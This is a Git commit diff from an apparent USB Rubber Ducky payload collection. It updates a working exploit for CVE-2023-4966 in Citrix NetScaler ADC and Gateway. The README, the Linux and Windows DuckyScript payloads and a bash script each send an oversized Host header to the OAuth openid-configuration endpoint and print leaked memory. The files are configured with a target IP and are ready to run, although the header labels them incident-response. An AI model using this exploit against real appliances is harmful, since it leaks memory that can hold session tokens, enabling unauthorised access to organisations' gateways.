Adapted to the use of variables
[+] Added vars [+] Attackmode [-] Img replaced with a link [+] README adapted to the new payloadpull/671/head
parent
bc056509f0
commit
9892715933
|
@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe
|
|||
|
||||
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
|
||||
|
||||
![](./assets/1.png)
|
||||
![](https://i.ibb.co/x7SRvGf/1.png)
|
||||
|
||||
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
|
||||
|
||||
## Settings
|
||||
|
||||
The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
|
||||
The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.
|
||||
|
||||
```DuckyScript
|
||||
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
```plaintext
|
||||
HOSTNAME='192.168.1.200'
|
||||
...
|
||||
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
```
|
||||
|
||||
## Payload Description Windows
|
||||
|
@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header
|
|||
$headers = @{ 'Host' = $header_value }
|
||||
```
|
||||
|
||||
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
|
||||
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
|
||||
|
||||
```powershell
|
||||
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
```
|
||||
|
||||
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
|
||||
|
@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'"
|
|||
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
|
||||
|
||||
```bash
|
||||
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
```
|
||||
|
||||
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
|
||||
|
@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating
|
|||
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||
echo "--- Dumped memory ---"
|
||||
echo "$response" | cut -c 131051-
|
||||
echo "The #HOSTNAME is vulnerable!"
|
||||
echo "The $HOSTNAME is vulnerable!"
|
||||
echo "--- End ---"
|
||||
else
|
||||
echo "Could not dump memory"
|
||||
|
@ -148,7 +149,7 @@ fi
|
|||
|
||||
## Script sh
|
||||
|
||||
The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
|
||||
The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
|
||||
|
||||
Example Execution:
|
||||
|
||||
|
@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th
|
|||
|
||||
## Sources
|
||||
|
||||
- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
|
||||
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
|
||||
1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
|
||||
2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff</h2>
|
||||
<h2 align="center">Aleff</h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
|
|
Binary file not shown.
Before Width: | Height: | Size: 61 KiB |
|
@ -3,29 +3,29 @@
|
|||
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||
* REM # Author : Aleff #
|
||||
* REM # Version : 1.0 #
|
||||
* REM # Category : incident-response #
|
||||
* REM # Category : incident-response #
|
||||
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||
* REM # #
|
||||
* REM ##################################################################################
|
||||
|
||||
* REM GNU/Linux Version
|
||||
ATTACKMODE HID
|
||||
|
||||
QUACK REM VARIABLES
|
||||
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||
HOSTNAME='192.168.1.200'
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK CTRL-ALT t
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING headers="-H 'Host:$header_value'"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
#!/bin/bash
|
||||
|
||||
hostname="$1" # first parameter
|
||||
HOSTNAME="$1" # first parameter
|
||||
|
||||
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||
|
||||
headers="-H 'Host:$header_value'"
|
||||
|
||||
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||
|
||||
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||
echo "--- Dumped memory ---"
|
||||
|
|
|
@ -8,7 +8,11 @@
|
|||
* REM # #
|
||||
* REM ##################################################################################
|
||||
|
||||
* REM Windows Version
|
||||
ATTACKMODE HID
|
||||
|
||||
QUACK REM VARIABLES
|
||||
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||
HOSTNAME='192.168.1.200'
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
|
@ -16,30 +20,24 @@ QUACK DELAY 500
|
|||
QUACK STRING powershell
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING $header_value = 'a' * 24576
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING $header_value = $header_value -replace "\n", ""
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
QUACK STRING $headers="-H 'Host:$header_value'"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
QUACK STRING $headers = @{'Host' = $header_value}
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
|
||||
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
||||
QUACK STRING if ($response.Substring(0, 3) -eq "200") {
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
|
|
Loading…
Reference in New Issue